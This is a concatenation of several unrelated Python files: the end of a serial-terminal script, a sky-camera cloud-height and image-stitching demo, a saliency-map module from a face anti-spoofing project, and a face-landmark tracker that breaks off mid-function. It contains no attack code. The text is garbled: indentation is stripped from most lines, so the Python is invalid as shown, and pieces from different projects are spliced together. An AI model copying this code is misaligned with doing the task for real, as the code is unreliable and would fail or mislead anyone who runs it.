convert_outgoing_cr = 1
rtscts = 0
xonxoff = 0
for o, a in opts:
if o in ("-h", "--help"): #help text
usage()
sys.exit()
elif o in ("-p", "--port"): #specified port
try:
port = int(a)
except ValueError:
port = a
elif o in ("-b", "--baud"): #specified baudrate
try:
baudrate = int(a)
except ValueError:
                raise ValueError("Baudrate must be an integer number")
elif o in ("-r", "--rtscts"):
rtscts = 1
elif o in ("-x", "--xonxoff"):
xonxoff = 1
elif o in ("-e", "--echo"):
echo = 1
elif o in ("-c", "--cr"):
convert_outgoing_cr = 0
try:
s = serial.Serial(port, baudrate, rtscts=rtscts, xonxoff=xonxoff)
except:
print "could not open port"
sys.exit(1)
print "--- Miniterm --- type Ctrl-D to quit"
#start serial->console thread
r = threading.Thread(target=reader)
r.setDaemon(1)
r.start()
#enter console->serial loop
writer()
print "\n--- exit ---"
|
stitch_demo.py
|
import numpy as np
import os,sys, glob
from matplotlib import pyplot as plt
import camera as cam
import stat_tools as st
from scipy.ndimage import morphology,filters, sobel ####more efficient than skimage
from skimage.morphology import remove_small_objects
from collections import deque
import multiprocessing,subprocess,pickle
import time, geo
from functools import reduce
from operator import concat
SAVE_FIG=True
REPROCESS=False ####reprocess already processed file?
MAX_INTERVAL = 179 ####max allowed interval between two frames for cloud motion estimation
deg2km=6367*np.pi/180
all_cams=['HD5A', 'HD5B', 'HD4A','HD4B', 'HD3A', 'HD3B','HD2B', 'HD2C', 'HD1B', 'HD1C'];
height_group={'HD1B':['HD1C', 'HD2B'], 'HD1C':['HD1B', 'HD2C'], 'HD2B':['HD2C', 'HD3A'], 'HD2C':['HD2B', 'HD3B'],\
'HD3A':['HD3B','HD4A'], 'HD3B':['HD3A', 'HD4B'], 'HD4A':['HD4B','HD5A'], 'HD4B':['HD4A', 'HD5A', 'HD3B'],\
'HD5A':['HD5B', 'HD4A', 'HD4B'], 'HD5B':['HD5A', 'HD4B']}
stitch_pair={'HD1B':'HD1C', 'HD1C':'HD1B','HD2B':'HD2C','HD2C':'HD2B','HD3A':'HD3B','HD3B':'HD3A', 'HD4A':'HD4B','HD4B':'HD4A', 'HD5A':'HD5B','HD5B':'HD5A'}
# camIDs=[['HD1B','HD1C'],['HD2B','HD2C'],['HD3A','HD3B'],['HD4A','HD4B'],['HD5A','HD5B']];
camIDs=['HD1B','HD2B','HD3A','HD4A','HD5A'];
cid_flat=camIDs+[stitch_pair[camID] for camID in camIDs]
# days=['20180823124','20180829165'];
# # days=['20180825161']; ####multilayer cloud
# days=['20180829165']
# days=['20180829162'] #####scattered cloud
days=['20181001141'] #####scattered cloud
# days=['20180922150'] ####high clouds
inpath='~/data/images/'
# tmpfs='/dev/shm/'
tmpfs='~/ldata/tmp/'
stitch_path='~/ldata/stitch/'
cameras={};
for camID in all_cams:
cameras[camID] = cam.camera(camID,max_theta=70,nx=1000,ny=1000)
lon0,lat0=cameras['HD5A'].lon,cameras['HD5B'].lat
x_cams=(cameras['HD1B'].lon-lon0)*deg2km*np.cos(cameras['HD1B'].lat*np.pi/180)
y_cams=(lat0-cameras['HD1B'].lat)*deg2km
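# Illustrative sketch (editor-added): the deg2km factor above is the arc length
# of one degree on a 6367 km radius sphere (~111.1 km). A small lon/lat offset
# converts to camera-plane kilometres like this (input values are hypothetical).
def _demo_deg2km(lat_deg=40.0, dlon_deg=0.01, dlat_deg=0.01):
    dx_km = dlon_deg*deg2km*np.cos(lat_deg*np.pi/180)  # east-west spacing shrinks with latitude
    dy_km = dlat_deg*deg2km
    return dx_km, dy_km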
def stitch(cams, dates):
for day in dates:
flist = sorted(glob.glob(inpath+camIDs[0]+'/'+day[:8]+'/'+camIDs[0]+'_'+day+'*jpg'))
if len(flist)<=1:
continue
for f in flist[1:]:
ymdhms=f[-18:-4]
print('Processing',ymdhms)
            if os.path.isfile(stitch_path+ymdhms+'.sth') and (not REPROCESS):  ######already processed, skip
continue
counter=0;
selected=[]; imgs=[]
for counter in range(20):
pkls=sorted(glob.glob(tmpfs+day[:8]+'/HD*_'+ymdhms+'.hkl'));
for pkl in pkls:
camID=pkl[-23:-19]
if camID not in cid_flat or camID in selected or stitch_pair[camID] in selected:
continue;
with open(pkl,'rb') as input:
try:
img=pickle.load(input)
except EOFError:
img=None
if img is not None:
imgs+=[img];
selected += [camID]
if len(selected)>=len(camIDs)-2:
break;
time.sleep(5);
if len(imgs)<=0:
continue
# print(selected)
h=[]; v=[]
for i, img in enumerate(imgs):
if np.isfinite(img.height):
h += [img.height]
if len(img.v)>=1:
v += [img.v]
if len(h)<=0 or len(v)<=0: ####clear sky
h=[15];
v=[[0,0]];
else:
h=np.array(h)/1e3; v=np.array(v)
h=np.nanmedian(h,axis=0); v=np.nanmedian(v,axis=0);
max_tan=np.tan(imgs[0].max_theta*np.pi/180)
for ilayer,height in enumerate(h):
if np.isnan(h[ilayer]): continue
stch=cam.stitch(ymdhms);
stch.sz,stch.saz=imgs[0].sz,imgs[0].saz
stch.height=height; stch.v=v
pixel_size=2*h[ilayer]*max_tan/imgs[0].nx;
stch.pixel_size=pixel_size;
xlen,ylen=2*h[ilayer]*max_tan+x_cams, 2*h[ilayer]*max_tan+y_cams
nstch_y,nstch_x=int(ylen//pixel_size),int(xlen//pixel_size)
stch.lon=lon0-h[ilayer]*max_tan/deg2km/np.cos(cameras['HD3A'].lat*np.pi/180);
stch.lat=lat0+h[ilayer]*max_tan/deg2km;
# print(pixel_size,xlen,ylen)
rgb=np.zeros((nstch_y,nstch_x,3),dtype=np.float32)
cnt=np.zeros((nstch_y,nstch_x),dtype=np.uint8);
cm=np.zeros((nstch_y,nstch_x),dtype=np.float32)
for i, img in enumerate(imgs):
start_x=(img.lon-lon0)*deg2km*np.cos(img.lat*np.pi/180)/pixel_size; start_x=int(start_x)
start_y=(lat0-img.lat)*deg2km/pixel_size; start_y=int(start_y)
tmp=np.flip(img.rgb,axis=1); #tmp[img.cm!=ilayer+1,:]=0;
mk=tmp[...,0]>0
# print(img.camID,ilayer,h[ilayer],start_x,start_y,mk.shape,stitched.shape)
rgb[start_y:start_y+img.ny,start_x:start_x+img.nx][mk]+=tmp[mk]
cnt[start_y:start_y+img.ny,start_x:start_x+img.nx]+=mk
if (img.cm is not None):
tmp=np.flip(img.cm,axis=1); #tmp[img.cm!=ilayer+1,:]=0;
cm[start_y:start_y+img.ny,start_x:start_x+img.nx][mk]+=tmp[mk]
for i in range(3):
rgb[...,i]/=cnt
cm/=cnt
# fig,ax=plt.subplots(1,2); ax[0].imshow(cnt); ax[1].imshow(rgb.astype(np.uint8)); plt.show()
stch.rgb=rgb.astype(np.uint8); stch.cm=(cm+0.5).astype(np.uint8)
# stch.dump_stitch(stitch_path+'/'+day[:8]+'/'+ymdhms+'.sth');
plt.figure(); plt.imshow(stch.rgb,extent=[0,xlen,ylen,0]);
plt.xlabel('East distance, km'); plt.ylabel('South distance, km')
plt.tight_layout();
plt.show();
# # fig.savefig(outpath+ymdhms); plt.close();
def height(args):
imager,neighbors,day=args
ymd=day[:8]
flist = sorted(glob.glob(inpath+imager.camID+'/'+ymd+'/'+imager.camID+'_'+day+'*jpg'))
if len(flist)<=0:
return
for f in flist:
basename=f[-23:-4]
        if os.path.isfile(tmpfs+f[-18:-10]+'/'+basename+'.hkl') and (not REPROCESS):  ######already processed, skip
continue
# print('Procesing', basename)
fpickle = glob.glob(tmpfs+f[-18:-10]+'/'+basename+'*pkl')
img=None
if len(fpickle)<=0:
img=cam.preprocess(imager,f,tmpfs);
else:
with open(fpickle[0],'rb') as input:
try:
img=pickle.load(input);
except EOFError:
img=None
if img is None or img.red is None:
continue
if img.layers<=0:
img.dump_img(tmpfs+f[-18:-10]+'/'+f[-23:-4]+'.hkl');
continue;
if img.layers>=1:
h = [np.nan]*img.layers
for inghb,neighbor in enumerate(neighbors):
bname=basename.replace(imager.camID,neighbor.camID);
fp_nb = glob.glob(tmpfs+f[-18:-10]+'/'+bname+'*pkl')
img1=None;
if len(fp_nb)<=0:
fnb=f.replace(imager.camID,neighbor.camID)
img1=cam.preprocess(neighbor,fnb,tmpfs); ###img object contains four data fields: rgb, red, rbr, and cm
else:
with open(fp_nb[0],'rb') as input:
try:
img1=pickle.load(input);
except EOFError:
img1=None
if img1 is None or img1.red is None:
continue
distance = 6367e3*geo.distance_sphere(img.lat,img.lon,img1.lat,img1.lon)
for ih in range(img.layers):
if np.isfinite(h[ih]):
continue
if (ih>=1) and (distance<500):
break;
res=cam.cloud_height(img,img1,layer=ih+1, distance=distance)
if np.isfinite(res) and res<20*distance and res>0.5*distance:
h[ih]=int(res);
# print('Cloud height computed for', f[-23:]);
# print('Cloud layer',ih+1,':',res,' computed with cameras ',img.camID,img1.camID,'(distance:',distance,'m)')
if not SAVE_FIG:
fig,ax=plt.subplots(2,2,figsize=(10,10),sharex=True,sharey=True);
ax[0,0].imshow(img.rgb); ax[0,1].imshow(img1.rgb);
ax[0,0].set_title(img.camID); ax[0,1].set_title(img1.camID)
ax[1,0].imshow(img.cm); ax[1,1].imshow(img1.cm);
ax[1,0].set_title(str(6367e3*geo.distance_sphere(img.lat,img.lon,img1.lat,img1.lon)))
plt.tight_layout();
plt.show();
if np.isfinite(h[-1]):
break
# img.height+=[h];
img.height=h;
img.dump_img(tmpfs+f[-18:-10]+'/'+f[-23:-4]+'.hkl');
if __name__ == "__main__":
for day in days:
if not os.path.isdir(stitch_path+day[:8]):
try:
subprocess.call(['mkdir', stitch_path+day[:8]])
except:
print('Cannot create directory,',stitch_path+day[:8])
continue
p0=multiprocessing.Process(target=stitch, args=(camIDs, days,))
p0.start();
p = multiprocessing.Pool(len(camIDs))
for day in days:
if not os.path.isdir(tmpfs+day[:8]):
try:
subprocess.call(['mkdir', tmpfs+day[:8]])
except:
print('Cannot create directory,',tmpfs+day[:8])
continue
# args=[[[camID for camID in camg], day] for camg in camIDs]
args=[[cameras[camID], [cameras[cmr] for cmr in height_group[camID]], day] for camID in cid_flat]
p.map(height,args)
p0.join();
|
saliency.py
|
from __future__ import division
import concurrent.futures
import os
import sys
import time
from threading import Thread
sys.path.append('/Users/rodrigobresan/Documents/dev/github/anti_spoofing/spoopy/spoopy')
import math
import networkx as nx
# import matplotlib.pyplot as plt
import numpy as np
import scipy.spatial.distance
import scipy.signal
import skimage
import skimage.color
import skimage.io
from skimage.segmentation import slic
from skimage.util import img_as_float
import cv2
def S(x1, x2, geodesic, sigma_clr=10):
return math.exp(-pow(geodesic[x1, x2], 2) / (2 * sigma_clr * sigma_clr))
def compute_saliency_cost(smoothness, w_bg, wCtr):
n = len(w_bg)
A = np.zeros((n, n))
b = np.zeros((n))
for x in range(0, n):
A[x, x] = 2 * w_bg[x] + 2 * (wCtr[x])
b[x] = 2 * wCtr[x]
for y in range(0, n):
A[x, x] += 2 * smoothness[x, y]
A[x, y] -= 2 * smoothness[x, y]
x = np.linalg.solve(A, b)
return x
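# Illustrative sketch (editor-added): with no smoothness coupling, the solve
# above reduces to x_i = wCtr_i / (w_bg_i + wCtr_i), so a background-weighted
# superpixel gets low saliency and a contrast-weighted one gets high saliency.
def _demo_compute_saliency_cost():
    smoothness = np.zeros((2, 2))
    w_bg = np.array([1.0, 0.1])
    wCtr = np.array([0.1, 1.0])
    return compute_saliency_cost(smoothness, w_bg, wCtr)  # approx [0.09, 0.91]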
def path_length(path, G):
dist = 0.0
for i in range(1, len(path)):
dist += G[path[i - 1]][path[i]]['weight']
return dist
def make_graph(grid):
# get unique labels
vertices = np.unique(grid)
# map unique labels to [1,...,num_labels]
reverse_dict = dict(zip(vertices, np.arange(len(vertices))))
grid = np.array([reverse_dict[x] for x in grid.flat]).reshape(grid.shape)
# create edges
down = np.c_[grid[:-1, :].ravel(), grid[1:, :].ravel()]
right = np.c_[grid[:, :-1].ravel(), grid[:, 1:].ravel()]
all_edges = np.vstack([right, down])
all_edges = all_edges[all_edges[:, 0] != all_edges[:, 1], :]
all_edges = np.sort(all_edges, axis=1)
num_vertices = len(vertices)
edge_hash = all_edges[:, 0] + num_vertices * all_edges[:, 1]
# find unique connections
edges = np.unique(edge_hash)
# undo hashing
edges = [[vertices[x % num_vertices], vertices[int(x / num_vertices)]] for x in edges]
return vertices, edges
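# Illustrative sketch (editor-added): make_graph on a tiny 2x2 label grid. With
# labels [[0, 1], [0, 2]] the unique superpixel adjacencies come back as the
# edges (0, 1), (0, 2) and (1, 2).
def _demo_make_graph():
    grid = np.array([[0, 1], [0, 2]])
    vertices, edges = make_graph(grid)
    return vertices, edges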
def get_saliency_rbd(img_path):
# Saliency map calculation based on:
# Saliency Optimization from Robust Background Detection, Wangjiang Zhu, Shuang Liang, Yichen Wei and Jian Sun, IEEE Conference on Computer Vision and Pattern Recognition (CVPR), 2014
img = skimage.io.imread(img_path)
if len(img.shape) != 3: # got a grayscale image
img = skimage.color.gray2rgb(img)
img_lab = img_as_float(skimage.color.rgb2lab(img))
img_rgb = img_as_float(img)
img_gray = img_as_float(skimage.color.rgb2gray(img))
segments_slic = slic(img_rgb, n_segments=250, compactness=10, sigma=1, enforce_connectivity=False)
num_segments = len(np.unique(segments_slic))
nrows, ncols = segments_slic.shape
max_dist = math.sqrt(nrows * nrows + ncols * ncols)
grid = segments_slic
(vertices, edges) = make_graph(grid)
gridx, gridy = np.mgrid[:grid.shape[0], :grid.shape[1]]
centers = dict()
colors = dict()
distances = dict()
boundary = dict()
for v in vertices:
centers[v] = [gridy[grid == v].mean(), gridx[grid == v].mean()]
colors[v] = np.mean(img_lab[grid == v], axis=0)
x_pix = gridx[grid == v]
y_pix = gridy[grid == v]
if np.any(x_pix == 0) or np.any(y_pix == 0) or np.any(x_pix == nrows - 1) or np.any(y_pix == ncols - 1):
boundary[v] = 1
else:
boundary[v] = 0
G = nx.Graph()
    # build the graph
for edge in edges:
pt1 = edge[0]
pt2 = edge[1]
color_distance = scipy.spatial.distance.euclidean(colors[pt1], colors[pt2])
G.add_edge(pt1, pt2, weight=color_distance)
# add a new edge in graph if edges are both on boundary
for v1 in vertices:
if boundary[v1] == 1:
for v2 in vertices:
if boundary[v2] == 1:
color_distance = scipy.spatial.distance.euclidean(colors[v1], colors[v2])
G.add_edge(v1, v2, weight=color_distance)
geodesic = np.zeros((len(vertices), len(vertices)), dtype=float)
spatial = np.zeros((len(vertices), len(vertices)), dtype=float)
smoothness = np.zeros((len(vertices), len(vertices)), dtype=float)
adjacency = np.zeros((len(vertices), len(vertices)), dtype=float)
sigma_clr = 10.0
sigma_bndcon = 1.0
sigma_spa = 0.25
mu = 0.1
all_shortest_paths_color = nx.shortest_path(G, source=None, target=None, weight='weight')
for v1 in vertices:
for v2 in vertices:
if v1 == v2:
geodesic[v1, v2] = 0
spatial[v1, v2] = 0
smoothness[v1, v2] = 0
else:
geodesic[v1, v2] = path_length(all_shortest_paths_color[v1][v2], G)
spatial[v1, v2] = scipy.spatial.distance.euclidean(centers[v1], centers[v2]) / max_dist
smoothness[v1, v2] = math.exp(
- (geodesic[v1, v2] * geodesic[v1, v2]) / (2.0 * sigma_clr * sigma_clr)) + mu
for edge in edges:
pt1 = edge[0]
pt2 = edge[1]
adjacency[pt1, pt2] = 1
adjacency[pt2, pt1] = 1
for v1 in vertices:
for v2 in vertices:
smoothness[v1, v2] = adjacency[v1, v2] * smoothness[v1, v2]
area = dict()
len_bnd = dict()
bnd_con = dict()
w_bg = dict()
ctr = dict()
wCtr = dict()
for v1 in vertices:
area[v1] = 0
len_bnd[v1] = 0
ctr[v1] = 0
for v2 in vertices:
d_app = geodesic[v1, v2]
d_spa = spatial[v1, v2]
w_spa = math.exp(- ((d_spa) * (d_spa)) / (2.0 * sigma_spa * sigma_spa))
area_i = S(v1, v2, geodesic)
area[v1] += area_i
len_bnd[v1] += area_i * boundary[v2]
ctr[v1] += d_app * w_spa
bnd_con[v1] = len_bnd[v1] / math.sqrt(area[v1])
w_bg[v1] = 1.0 - math.exp(- (bnd_con[v1] * bnd_con[v1]) / (2 * sigma_bndcon * sigma_bndcon))
for v1 in vertices:
wCtr[v1] = 0
for v2 in vertices:
d_app = geodesic[v1, v2]
d_spa = spatial[v1, v2]
w_spa = math.exp(- (d_spa * d_spa) / (2.0 * sigma_spa * sigma_spa))
wCtr[v1] += d_app * w_spa * w_bg[v2]
# normalise value for wCtr
min_value = min(wCtr.values())
max_value = max(wCtr.values())
minVal = [key for key, value in wCtr.items() if value == min_value]
maxVal = [key for key, value in wCtr.items() if value == max_value]
for v in vertices:
wCtr[v] = (wCtr[v] - min_value) / (max_value - min_value)
img_disp1 = img_gray.copy()
img_disp2 = img_gray.copy()
x = compute_saliency_cost(smoothness, w_bg, wCtr)
for v in vertices:
img_disp1[grid == v] = x[v]
img_disp2 = img_disp1.copy()
sal = np.zeros((img_disp1.shape[0], img_disp1.shape[1], 3))
sal = img_disp2
sal_max = np.max(sal)
sal_min = np.min(sal)
sal = 255 * ((sal - sal_min) / (sal_max - sal_min))
return sal
def get_saliency_ft(img_path):
# Saliency map calculation based on:
img = skimage.io.imread(img_path)
img_rgb = img_as_float(img)
img_lab = skimage.color.rgb2lab(img_rgb)
mean_val = np.mean(img_rgb, axis=(0, 1))
kernel_h = (1.0 / 16.0) * np.array([[1, 4, 6, 4, 1]])
kernel_w = kernel_h.transpose()
blurred_l = scipy.signal.convolve2d(img_lab[:, :, 0], kernel_h, mode='same')
blurred_a = scipy.signal.convolve2d(img_lab[:, :, 1], kernel_h, mode='same')
blurred_b = scipy.signal.convolve2d(img_lab[:, :, 2], kernel_h, mode='same')
blurred_l = scipy.signal.convolve2d(blurred_l, kernel_w, mode='same')
blurred_a = scipy.signal.convolve2d(blurred_a, kernel_w, mode='same')
blurred_b = scipy.signal.convolve2d(blurred_b, kernel_w, mode='same')
im_blurred = np.dstack([blurred_l, blurred_a, blurred_b])
sal = np.linalg.norm(mean_val - im_blurred, axis=2)
sal_max = np.max(sal)
sal_min = np.min(sal)
sal = 255 * ((sal - sal_min) / (sal_max - sal_min))
return sal
def extract_rbd_saliency_folder(folder_path, output_root):
print('Extract saliency called')
files = os.listdir(folder_path)
start_time = time.time()
with concurrent.futures.ProcessPoolExecutor() as executor:
for raw_frame in files:
frame_path = os.path.join(folder_path, raw_frame)
output_path = os.path.join(output_root, raw_frame)
print('executor submited')
executor.submit(extract_rbd_saliency, frame_path, output_path)
# threads = []
# for frame in files:
# print('Saliency on ' + frame)
# path_frame = os.path.join(folder_path, frame)
# output_path = os.path.join(output_root, frame)
# thread = Thread(target=extract_rbd_saliency, args=(path_frame, output_path))
# threads.append(thread)
# thread.start()
#
# for thread in threads:
# thread.join()
print("--- %d seconds avg---" % ((time.time() - start_time) / len(files)))
def extract_rbd_saliency(file_path, output_path):
print('extracting saliency for ' + file_path + ' output:' + output_path)
if not os.path.exists(output_path):
try:
rbd = get_saliency_rbd(file_path).astype('uint8')
cv2.imwrite(output_path, rbd)
except Exception as e:
print(e)
else:
print('saliency already exists')
if __name__ == '__main__':
extract_rbd_saliency('/codes/bresan/remote/spoopy/spoopy/data/extracted_maps/csbr/cbsr/all/test/attack/attack/raw/2_3_frame_0.jpg',
'/codes/bresan/remote/spoopy/spoopy/data/extracted_maps/csbr/cbsr/all/test/attack/attack/saliency_raw/2_3_frame_0.jpg')
|
tracker.py
|
import os
import numpy as np
import math
import cv2
import onnxruntime
import time
import queue
import threading
import copy
from similaritytransform import SimilarityTransform
from retinaface import RetinaFaceDetector
from remedian import remedian
def resolve(name):
f = os.path.join(os.path.dirname(__file__), name)
return f
def clamp_to_im(pt, w, h):
x = pt[0]
y = pt[1]
if x < 0:
x = 0
if y < 0:
y = 0
if x >= w:
x = w-1
if y >= h:
y = h-1
return (int(x), int(y+1))
def rotate(origin, point, a):
a = -a
ox, oy = origin
px, py = point
qx = ox + math.cos(a) * (px - ox) - math.sin(a) * (py - oy)
qy = oy + math.sin(a) * (px - ox) + math.cos(a) * (py - oy)
return qx, qy
def angle(p1, p2):
p1 = np.array(p1)
p2 = np.array(p2)
a = np.arctan2(*(p2 - p1)[::-1])
return (a % (2 * np.pi))
def compensate(p1, p2):
a = angle(p1, p2)
return rotate(p1, p2, a), a
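# Illustrative sketch (editor-added): angle() measures the direction from p1 to
# p2 and rotate() undoes it, so compensate() maps p2 onto p1's horizontal axis.
def _demo_compensate():
    (qx, qy), a = compensate((0.0, 0.0), (1.0, 1.0))
    return (qx, qy), a  # roughly ((1.414, 0.0), pi/4)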
def rotate_image(image, a, center):
(h, w) = image.shape[:2]
a = np.rad2deg(a)
M = cv2.getRotationMatrix2D((float(center[0]), float(center[1])), a, 1.0)
rotated = cv2.warpAffine(image, M, (w, h))
return rotated
def intersects(r1, r2, amount=0.3):
area1 = r1[2] * r1[3]
area2 = r2[2] * r2[3]
inter = 0.0
total = area1 + area2
r1_x1, r1_y1, w, h = r1
r1_x2 = r1_x1 + w
r1_y2 = r1_y1 + h
r2_x1, r2_y1, w, h = r2
r2_x2 = r2_x1 + w
r2_y2 = r2_y1 + h
left = max(r1_x1, r2_x1)
right = min(r1_x2, r2_x2)
top = max(r1_y1, r2_y1)
bottom = min(r1_y2, r2_y2)
if left < right and top < bottom:
inter = (right - left) * (bottom - top)
total -= inter
if inter / total >= amount:
return True
return False
#return not (r1_x1 > r2_x2 or r1_x2 < r2_x1 or r1_y1 > r2_y2 or r1_y2 < r2_y1)
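# Illustrative sketch (editor-added): two 10x10 boxes offset by 5 pixels share
# only ~14% of their union area (below the default 30% threshold), while boxes
# offset by 2 pixels share ~47% and are considered intersecting.
def _demo_intersects():
    barely = intersects((0, 0, 10, 10), (5, 5, 10, 10))   # False
    mostly = intersects((0, 0, 10, 10), (2, 2, 10, 10))   # True
    return barely, mostly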
def group_rects(rects):
rect_groups = {}
for rect in rects:
rect_groups[str(rect)] = [-1, -1, []]
group_id = 0
for i, rect in enumerate(rects):
name = str(rect)
group = group_id
group_id += 1
if rect_groups[name][0] < 0:
rect_groups[name] = [group, -1, []]
else:
group = rect_groups[name][0]
for j, other_rect in enumerate(rects):
if i == j:
continue;
            inter = intersects(rect, other_rect)
            if inter:
rect_groups[str(other_rect)] = [group, -1, []]
return rect_groups
def logit(p, factor=16.0):
if p >= 1.0:
p = 0.9999999
if p <= 0.0:
p = 0.0000001
p = p/(1-p)
return float(np.log(p)) / float(factor)
def logit_arr(p, factor=16.0):
p = np.clip(p, 0.0000001, 0.9999999)
return np.log(p / (1 - p)) / float(factor)
def matrix_to_quaternion(m):
t = 0.0
q = [0.0, 0.0, 0, 0.0]
if m[2,2] < 0:
if m[0,0] > m[1,1]:
t = 1 + m[0,0] - m[1,1] - m[2,2]
q = [t, m[0,1]+m[1,0], m[2,0]+m[0,2], m[1,2]-m[2,1]]
else:
t = 1 - m[0,0] + m[1,1] - m[2,2]
q = [m[0,1]+m[1,0], t, m[1,2]+m[2,1], m[2,0]-m[0,2]]
else:
if m[0,0] < -m[1,1]:
t = 1 - m[0,0] - m[1,1] + m[2,2]
q = [m[2,0]+m[0,2], m[1,2]+m[2,1], t, m[0,1]-m[1,0]]
else:
t = 1 + m[0,0] + m[1,1] + m[2,2]
q = [m[1,2]-m[2,1], m[2,0]-m[0,2], m[0,1]-m[1,0], t]
q = np.array(q, np.float32) * 0.5 / np.sqrt(t)
return q
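# Illustrative sketch (editor-added): the identity rotation matrix maps to the
# identity quaternion [0, 0, 0, 1] under the branch ordering used above.
def _demo_matrix_to_quaternion_identity():
    return matrix_to_quaternion(np.eye(3, dtype=np.float32))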
def worker_thread(session, frame, input, crop_info, queue, input_name, idx, tracker):
output = session.run([], {input_name: input})[0]
conf, lms = tracker.landmarks(output[0], crop_info)
if conf > tracker.threshold:
try:
eye_state = tracker.get_eye_state(frame, lms)
except:
eye_state = [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
queue.put((session, conf, (lms, eye_state), crop_info, idx))
else:
queue.put((session,))
class Feature():
def __init__(self, threshold=0.15, alpha=0.2, hard_factor=0.15, decay=0.001, max_feature_updates=0):
self.median = remedian()
self.min = None
self.max = None
self.hard_min = None
self.hard_max = None
self.threshold = threshold
self.alpha = alpha
self.hard_factor = hard_factor
self.decay = decay
self.last = 0
self.current_median = 0
self.update_count = 0
self.max_feature_updates = max_feature_updates
self.first_seen = -1
self.updating = True
def update(self, x, now=0):
if self.max_feature_updates > 0:
if self.first_seen == -1:
self.first_seen = now;
new = self.update_state(x, now=now)
filtered = self.last * self.alpha + new * (1 - self.alpha)
self.last = filtered
return filtered
def update_state(self, x, now=0):
updating = self.updating and (self.max_feature_updates == 0 or now - self.first_seen < self.max_feature_updates)
if updating:
self.median + x
self.current_median = self.median.median()
else:
self.updating = False
median = self.current_median
if self.min is None:
if x < median and (median - x) / median > self.threshold:
if updating:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
return 0
else:
if x < self.min:
if updating:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
if self.max is None:
if x > median and (x - median) / median > self.threshold:
if updating:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
return 0
else:
if x > self.max:
if updating:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
if updating:
if self.min < self.hard_min:
self.min = self.hard_min * self.decay + self.min * (1 - self.decay)
if self.max > self.hard_max:
self.max = self.hard_max * self.decay + self.max * (1 - self.decay)
if x < median:
return - (1 - (x - self.min) / (median - self.min))
elif x > median:
return (x - median) / (self.max - median)
return 0
class FeatureExtractor():
def __init__(self, max_feature_updates=0):
self.eye_l = Feature(max_feature_updates=max_feature_updates)
self.eye_r = Feature(max_feature_updates=max_feature_updates)
self.eyebrow_updown_l = Feature(max_feature_updates=max_feature_updates)
self.eyebrow_updown_r = Feature(max_feature_updates=max_feature_updates)
self.eyebrow_quirk_l = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.eyebrow_quirk_r = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.eyebrow_steepness_l = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.eyebrow_steepness_r = Feature(threshold=0.05, max_feature_updates=max_feature_updates)
self.mouth_corner_updown_l = Feature(max_feature_updates=max_feature_updates)
self.mouth_corner_updown_r = Feature(max_feature_updates=max_feature_updates)
self.mouth_corner_inout_l = Feature(threshold=0.02, max_feature_updates=max_feature_updates)
self.mouth_corner_inout_r = Feature(threshold=0.02, max_feature_updates=max_feature_updates)
self.mouth_open = Feature(max_feature_updates=max_feature_updates)
self.mouth_wide = Feature(threshold=0.02, max_feature_updates=max_feature_updates)
def align_points(self, a, b, pts):
a = tuple(a)
b = tuple(b)
alpha = angle(a, b)
alpha = np.rad2deg(alpha)
if alpha >= 90:
alpha = - (alpha - 180)
if alpha <= -90:
alpha = - (alpha + 180)
alpha = np.deg2rad(alpha)
aligned_pts = []
for pt in pts:
aligned_pts.append(np.array(rotate(a, pt, alpha)))
return alpha, np.array(aligned_pts)
def update(self, pts, full=True):
features = {}
now = time.perf_counter()
norm_distance_x = np.mean([pts[0, 0] - pts[16, 0], pts[1, 0] - pts[15, 0]])
norm_distance_y = np.mean([pts[27, 1] - pts[28, 1], pts[28, 1] - pts[29, 1], pts[29, 1] - pts[30, 1]])
a1, f_pts = self.align_points(pts[42], pts[45], pts[[43, 44, 47, 46]])
f = abs((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y)
features["eye_l"] = self.eye_l.update(f, now)
a2, f_pts = self.align_points(pts[36], pts[39], pts[[37, 38, 41, 40]])
f = abs((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y)
features["eye_r"] = self.eye_r.update(f, now)
if full:
a3, _ = self.align_points(pts[0], pts[16], [])
a4, _ = self.align_points(pts[31], pts[35], [])
norm_angle = np.mean(list(map(np.rad2deg, [a1, a2, a3, a4])))
a, f_pts = self.align_points(pts[22], pts[26], pts[[22, 23, 24, 25, 26]])
features["eyebrow_steepness_l"] = self.eyebrow_steepness_l.update(-np.rad2deg(a) - norm_angle, now)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_l"] = self.eyebrow_quirk_l.update(f, now)
a, f_pts = self.align_points(pts[17], pts[21], pts[[17, 18, 19, 20, 21]])
features["eyebrow_steepness_r"] = self.eyebrow_steepness_r.update(np.rad2deg(a) - norm_angle, now)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_r"] = self.eyebrow_quirk_r.update(f, now)
else:
features["eyebrow_steepness_l"] = 0.
features["eyebrow_steepness_r"] = 0.
features["eyebrow_quirk_l"] = 0.
features["eyebrow_quirk_r"] = 0.
f = (np.mean([pts[22, 1], pts[26, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_l"] = self.eyebrow_updown_l.update(f, now)
f = (np.mean([pts[17, 1], pts[21, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_r"] = self.eyebrow_updown_r.update(f, now)
upper_mouth_line = np.mean([pts[49, 1], pts[50, 1], pts[51, 1]])
center_line = np.mean([pts[50, 0], pts[60, 0], pts[27, 0], pts[30, 0], pts[64, 0], pts[55, 0]])
f = (upper_mouth_line - pts[62, 1]) / norm_distance_y
features["mouth_corner_updown_l"] = self.mouth_corner_updown_l.update(f, now)
if full:
f = abs(center_line - pts[62, 0]) / norm_distance_x
features["mouth_corner_inout_l"] = self.mouth_corner_inout_l.update(f, now)
else:
features["mouth_corner_inout_l"] = 0.
f = (upper_mouth_line - pts[58, 1]) / norm_distance_y
features["mouth_corner_updown_r"] = self.mouth_corner_updown_r.update(f, now)
if full:
f = abs(center_line - pts[58, 0]) / norm_distance_x
